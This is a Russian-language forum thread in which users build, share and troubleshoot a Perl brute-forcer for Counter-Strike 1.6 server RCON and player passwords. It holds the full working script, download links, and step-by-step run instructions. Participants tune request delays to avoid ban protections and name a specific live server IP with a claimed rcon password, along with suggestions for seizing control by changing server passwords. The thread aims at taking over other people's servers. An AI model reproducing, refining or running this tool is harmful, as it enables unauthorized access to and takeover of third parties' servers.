![]() |
Брут пароля Counter-Strike 1.6
:( Народ посодействуйте в бруте есть небольшой сырой материалец по написанию брута к CS 1.6( rcon пароль надо найти).Наводку дали такую: смотри в код Born to be pig эксплоита, там есть все что надо для подбора пароля и еще реализован он через Indy UDPClient -те.
Я нашел етот cs-exploit(не нашел где его здесь выложить) вот тока разобратся немогу как реализовать.А брут позарез нужен помогите. |
Ты хотя бы выложил ссылку на експ. если её нет, то залей на обменик.
P.S. а ты раздел не перепутал? P.S.S это случаем не твоя тема с экспом? http://www.nulled.ws/showthread.php?t=115600 |
хм.. недавно делал) так и забил на ето..
возможно доделаю, выложу. зы: перл |
Цитата:
|
Цитата:
|
Oledga, пробуй:
тынц csBrute-PlayerPassword - брут PlayerPassword csBrute-RconPassword - брут RconPassword в pass.txt пароли. use: .pl <host> <port> .. <name> |
Не работает. Пишет "Hacking Atemp"
http://profiles.inbox.lv/uploads/l/1224190.jpeg + Amx Mod банит ип с которого производился брут ... |
видимо стоит amx плагин какой-то, и банит.
стандартный hlds тоже банит за 5 неверных.. открой скрипт, и попробуй изменить что-то ) |
server(player) password:
http://s55.radikal.ru/i150/0906/b1/dd0b8ba86689.jpg rcon password: http://s53.radikal.ru/i140/0906/98/750d90833bf2.jpg з.ы.: hlds банит после 5и неправильных (!) |
br1tva, посмотри на свой скриншот, но окно брута PlayerPassword. ты его не подобрал, т.е. ты не знаешь пароль доступа к серверу, т.е. ты не сможешь даже зайти туда, не то что rcon подобрать..
сперва подбери пароль к серверу (csBrute-PlayerPassword) , а потом к rcon'y: Код:
csBrute-RconPassword.pl <host> <port> пароль к серверу <name> |
1 скрин это консоль сервера, который запущен у меня на компе, там видно что брутер коннектица и подбирает пасы , но Amx мод палит что это Хак Атака и даже если подобран верный пасс amx шлёт куда подальше .. (=
P.S Для ввода rcon_password ненужны никакие Playerpasswordi . Зайди на любой сервак открой консоль и погнал вводить rcon_password "pass" (= |
под PlayerPassword я имею в виду:
http://s56.radikal.ru/i154/0906/71/f00a34b322e2.jpg а rcon_password ты не сможешь подбирать, если не зайдешь на сервер. |
eLWAux тут ты немного неправ.
Ркон можно брутить и без "ServerPassworda", смотри как : Пишем в консоле : rcon_adres: 78.84.231.26 rcon_port: 27015 rcon_password "tut mi podbiraem pass " Вот и всё . Дальше можно сделать так , rcon sv_password "new pass" . P.s Можешь проверить на 78.84.231.26:27015 (rcon_pass 123) |
br1tva, да, про ето я незнал )
|
eLWAux и если сделать задержку ввода паса на 3 секунды , то Hlds банить не будет....
Если есть время и желание подправь немного брут сделай с задержкой в 3 сек .. тогда всё будет супер =ъ |
Цитата:
Код:
sleep(3); |
eLWAux чекни пм ...
|
Цитата:
Код:
..................uasc.org.ua/files/csBrute-.ZIP качай. там три версии.. |
со sleep (3) всё таки сервер банит ... а вот с sleep(10) брутит на ура (=
|
Цитата:
Как я панимаю сделано на перле ладно попробуем протестить мож че и понаворотим ;) |
Цитата:
1)поставил ActivePerl-5.10.0.1003 2)нашел сервачек в своей локалке к примеру вот 204.205.206.207:27015 3)захожу в файл csBrute-RconPassword.pl блокнотом правлю там строки(1.2.3.4 меняю на 204.205.206.207;строки abc usernamer не трогаю ), use IO::Socket; print "\n". " CS <RCON password> bruter\n". " eLwaux(c)2009\n\n\n"; if (!$ARGV[0]) { print " use: csBrute.pl <host> <port> <server password > <name>\n". " csBrute.pl 204.205.206.207 27015 abc usernamer\n"; 4)2 раза мышью кликаю на файле csBrute-RconPassword.pl ,а он отрывается и тут же закрывается . :confused: Что не так делаю? Ведь на серваке нет <server password > <name>,а я их не меняю ну и имя админа впринципе никчему для брута. |
перл запускать нужно через командную строку.
|
Цитата:
|
Напиши свою асю , помогу разобраться !!
|
Цитата:
,а так то я все правильно сделал?У мня 2 сетевухи 2 мож отрубить надо попробую вечером мож запашет :confused: |
Для начала тебе нужно немного подправить код csBrute-RconPassword.pl , открой csBrute-RconPassword.pl блокнотом NotePad далее замени код на вот этот:
use IO::Socket; print "\n". " CS <RCON password> bruter\n". " eLwaux(c)2009\n\n\n"; if (!$ARGV[0]) { print " use: csBrute.pl <host> <port> <server password > <name>\n". " csBrute.pl 1.2.3.4 27015 abc usernamer\n"; exit(0); } $host = shift || '1.2.103.250'; $port = shift || '27015'; $serverpass = shift || 'n0th1ng'; $name = shift || 'pomKa'; $pasw = 'server is not protected by password!'; open (FILE, '<pass.txt') || die(" [-] pass.txt not found!\n"); my @p : shared = <FILE>; print ' > Loaded '.scalar(@p)." password(s)\n"; chomp(@p); close(FILE); my $good = 0; my $sock = new IO::Socket::INET( PeerAddr=>$host, PeerPort=>$port, Proto=>'udp') || die " [-] server not found!"; $c = "\xFF\xFF\xFF\xFFgetchallenge valve\x0a"; syswrite $sock, $c; sysread $sock,$a,65535; # ****A00000000 99271855 2 if ($a =~ /\xFF\xFF\xFF\xFFA00000000\x20(\d+)/) { $id = $1; $c = "\xFF\xFF\xFF\xFF". "connect 47 ".$id." ". '"\prot\2\raw\d984a05fa268b7cc6ac052a38960aeb'.ran d(9).'" '.#2 '"'. '\_cl_autowepswitch\1'. '\bottomcolor\6'. '\cl_dlmax\80'. '\cl_lc\1'. '\cl_lw\1'. '\cl_updaterate\20'. '\model\gordon'. '\name\\'.$name. '\topcolor\30'. '\_pw\cracker'. '\lac_id\LACID_NOLAC'.rand(9).''. '\_vgui_menus\1'. '\_ah\0'. '\lang\ru'. '\dzuid\DZUID_0:0:7528570'.rand(9).''.#9 '\rate\25000'. '\*fid\0'. '\password\\'.$serverpass. '"'."\x0a"; # print $c; syswrite $sock, $c; sysread $sock,$a,65535; # full server: ****B 129 "1.2.3.4:25015" 0 # unk password: BADPASSWORD # serv full : SERVERISFULL if ($a =~ /SERVERISFULL/) { print 'FULL SERVER. waiting few seconds..'."\n"; sleep(10); } elsif($a =~ /BADPASSWORD/) { print " [-] Bad PlayerPassword!\n"; exit(0); } else { $good = 1; } } else { if ($a=~/banned/) { print ' [!] you are banned!'."\n". " change IP!\n"; exit(0); } else { print ' [-] some trouble with answer ('.$a.')!'."\n"; exit(0); } } while(1) { sleep(10); # server is not full # and we are connected $c = "\xFF\xFF\xFF\xFF". "rcon ".$id.' "'.$pasw.'" sv_restart 1'."\x00"; syswrite $sock, $c; sysread $sock,$a,65535; # print '---'.$a."\n\n\n\n"; if ($a =~ /Bad rcon_password/) { #bad rcon_password print ' - '.$pasw."\n"; } else { print ' [+] '.$pasw."\n"; exit(0); } $pasw = shift @p; if (!$pasw) {print ' [-] password not found!';exit(0);} } exit(); Далее заходишь в c:\WINDOWS\system32\ и находишь там файл cmd.exe , копируешь его в папку с брутом. В папке с брутом запускаешь cmd.exe и в командной строке прописываешь следующие: csBrute-RconPassword.pl 78.84.231.21 27015 Вместо 78.84.231.21 ип адрес сервера который ты собрался брутить. P.S Теперь вопросов не должно быть (= |
а если rcon пустой? xDDD
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
AMX Mod X 1.71 Metamod-1.19 StatsMe 2.8.3 HLGuard 1.9n4 + Reallite HLGuard Anti-Cheats Config 1.7 DeathMatch Mod 1.7 ( csdm_active 1 в amxx.cfg (...addons\amxmodx\configs\ ) ) ATAC 2.5.5.0 Резултаты такие: 1)при sleep (1)-(7)банит сама Hlds 2)при sleep (8) не банит пароль найден :) |
Интересную штуку я заметил эта прога может удаленно посылать команды в консоль сервера (в данном случае ркон пароли посылает) было бы класно еслиб она делала разбан игрока всеволишь то надо в словарик с паролем записать amx_unban "204.205.206.207" и подредоктировать csBrute-RconPassword.pl чтоб посылал эту команду, а пока что она впереди прописывает
rcon 1851658075(т.е. id игрока). eLWAux можешь подредактировать csBrute-RconPassword.pl или думаеш что это бредовая идея? |
Цитата:
открываешь cmd в той дире, где скрипт, и запускаешь: Код:
csBrute-RconPassword.plЦитата:
"как сделать с полным перебором по буквам и символам"? все пароли в файле pass.txt, туда и кидай все что нужно. с помощью спец. програм создавай список и юзай его. Цитата:
Цитата:
сбрутил пароль ркон, зашел на сервер и командуешь там.. хотя сделаю сейчас.. ждите 20минут ) |
удаленное администрирование , зная RCON пароль, кс сервера
http://i050.radikal.ru/0906/f7/8696884b4281.jpg csBrute-Rcon.pl <host> <port> <rcon password> <name> uasc.org.ua/files/csBrute-.zip |
|
;) Отлично спасибо у меня тока вот какой вопрос счас возник почему там два файлика csBrute-RconPassword1.pl и csBrute-RconPassword2.pl(ну в принципе и в старом было тоже 2) они оба используются в переборе или надо сначала попробовать запустить первый csBrute-RconPassword1.pl в cmd.exe а потом второй попробовать csBrute-RconPassword2.pl (я к тому спрашиваю потому как в старом тоже 2 лежало файла csBrute-RconPassword.pl и csBrute-RconPassword2.pl я тестил тока со sleep (8) тока с csBrute-RconPassword.pl)? А так все COOL завтра попробую еще потестить потом отпишусь обязательно.
|
Цитата:
|
Цитата:
мож кто знает лекарство от таких умников? ЗЫ: Oledga, дай линк где прочитал что ркон пустым не может быть... |
[QUOTE=Oledga]Да счас уже не припомню где и находил ,но помоему на тех сайтах где выложены инструкции по созданию сервака. Но даже из своего личного опыта попробуй запустить HLDS без ркона и у тя не получится там минимум три символа просит,тока тода запускается.
Так если ты админ в локалке что мешает тебе поставить пароль в конфигах сервака (1. Делаем себя Админом ! найди файл users.ini (...\cstrike\addons\amxmodx\configs\ ) найдите в нем строчку "User" "password" "abcdefghijklmnopqrstu" "a" Первое - ник игрока; Второе - пароль на доступ; Третье - уровень доступа; Четвёртое - флаги. Далее зайдите в ...\cstrike в файл autoexec.cfg и исправте эту строчку: setinfo "_pw" "ВАШ ПАРОЛЬ" пароль должен быть таким, каким вы его писали в users.ini Сохраните и закройте файл. перед конектом к серверу в консоле пишете setinfo _pw mypassword. А вообще пароль можно здесь еще глянуть C:\Program Files\Counter-Strike 1.6\platform\config\ файл ---- Server.vdf там и лежит ркон Или проще его снести и поставить новый. :D |
Цитата:
1)csBrute-RconPassword1.pl выдает ложный пароль на 7 в списке pass(т.е. находит не тот пароль) 2)csBrute-RconPassword2.pl виснет после 5 паролей 3)csBrute-PlayerPassword.pl работает отлично находит пароль(даже работает при sleep (1) не банит) |
| Время: 01:27 |